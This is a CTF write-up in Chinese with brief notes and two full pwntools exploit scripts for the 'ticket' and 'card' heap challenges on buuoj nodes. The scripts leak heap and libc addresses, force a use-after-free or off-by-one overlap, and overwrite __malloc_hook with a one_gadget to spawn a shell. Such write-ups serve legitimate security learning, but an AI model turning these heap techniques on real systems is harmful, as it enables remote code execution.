DASCTFxBuuctf五月大联动
还得加油
# ticket
libc-2.23 下的题目,漏洞点在于只要某个位置 + 6 的地方有值,就可以 free 该位置,之后将那个位置 + 6 位置清 0
- 将输入信息的堆块申请两次,之后 free 掉 name 和(-2 和 - 1)再显示信息就可以泄露堆地址
- 利用 unsortedbin 切割后输出泄露出 libc 地址
- 既然我们有堆地址,那么我们可以在 age 出伪造一个指针,这个指针指向一个堆块,那么加上之前申请的一个指针就有两个指针指向了同一个堆块,强行 uaf
- 利用 relloc 调节栈帧再使用 onegadget getshell
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
context.log_level = 'debug'
binary = 'ticket'
elf = ELF(binary)
libc = ELF("./libc-2.23.so")
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
#p = process(["qemu-aarch64","-L","",binary])
#p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
host = "node3.buuoj.cn"
port = 29266
p = remote(host,port)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def dbg():
gdb.attach(p)
pause()
def cmd(num):
sla(">>",num)
def add(id,size):
cmd(1)
sla("Index:",id)
sla("size:",size)
def delete(id):
cmd(2)
sla("Index:",id)
def edit(id,text):
cmd(3)
sla("Index:",id)
sla("remarks:",text)
def show(id):
cmd(4)
sla("Index:",id)
def show_info():
cmd(6)
def info(addr):
sa("Your name:","a"*0x20)
sa("take off(wu hu qi fei): ","a"*0x20)
sla("Your age: ",addr)
one_gad = [0x45216,0x4526a,0xf02a4,0xf1147]
info(1)
cmd(5)
info(1)
add(4,0x100) # 保证name+6地方有值
add(5,0x100)
delete(-2)
delete(-1)
show_info()
p.recvuntil("Saying: ")
heap_addr = u64(p.recvuntil("\x0a")[0:-1].ljust(8,"\x00"))
lg("leak",heap_addr)
add(0,0x28)
add(1,0x28)
add(2,0x118)
add(3,0x118)
delete(2)
add(2,0x28)
show(2)
__malloc_hook = l64() - 360 - 16
lg("__malloc_hook",__malloc_hook)
libc_base = __malloc_hook - libc.sym["__malloc_hook"]
realloc = libc.sym["realloc"] + libc_base
one_gadget = libc_base + one_gad[0]
lg("realloc",realloc)
lg("libc_base",libc_base)
delete(2)
delete(-10)
add(2,0x60) #0x70大小可以与malloc处伪造堆块链到
cmd(5)
info(heap_addr+0x2b0+0x10)
delete(-3)
edit(2 ,p64(__malloc_hook - 0x23)) #构造两个指针指向同一堆块
delete(0)
delete(1)
add(0,0x68)
add(1,0x68)
payload = "a"*0xb + p64(one_gad[1] + libc_base) + p64(realloc +6)
edit(1, payload)
#dbg()
delete(-10)
cmd(5)
p.interactive()# card
libc-2.27 off-by-one
# -*- coding: utf-8 -*-
import sys
import os
from pwn import *
context.log_level = 'debug'
binary = 'card'
elf = ELF('card')
libc = ELF("libc.so")
context.binary = binary
DEBUG = 0
if DEBUG:
p = process(binary)
#p = process(["qemu-aarch64","-L","",binary])
#p = process(["qemu-aarch64","-L","",-g,"1234",binary])
else:
host = "node3.buuoj.cn"
port = 25850
p = remote(host,port)
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
def dbg():
gdb.attach(p)
pause()
def cmd(num):
sla("choice:",num)
def add(id,size,text):
cmd(1)
sla("card:",id)
sla("power:",size)
sla("quickly!",text)
def edit(id,text):
cmd(2)
sla("card",id)
sla("show",text)
def delete(id):
cmd(3)
sla("card:",id)
def show(id):
cmd(4)
sla(":",id)
one_gadget = [0x4f2c5,0x4f322,0x10a38c]
for i in range(7):
add(i,0x98,"aaaa")
add(7,0x98,"aaaa")
add(8,0x98,"aaaa")
for i in range(7):
delete(i)
delete(7)
add(9,0x18,"aaa")
add(10,0x18,"aaa")
add(11,0x18,"aaa")
show(9)
l64()
__malloc_hook = l64() - 240 - 16
lg("leak",__malloc_hook)
libc_base = __malloc_hook - libc.sym["__malloc_hook"]
edit(9,"\x00"*0x18 + "\x41" )
delete(10)
add(10,0x38,"aaa")
delete(11)
payload = p64(0) *3 + p64(0x21) + p64(__malloc_hook)
edit(10,payload)
add(0,0x18,"aaa")
add(1,0x18,p64(one_gadget[2]+libc_base))
cmd(1)
sla("card:",3)
sla("power:",0x10)
p.interactive()本作品采用 知识共享署名-非商业性使用-禁止演绎 4.0 国际许可协议 进行许可。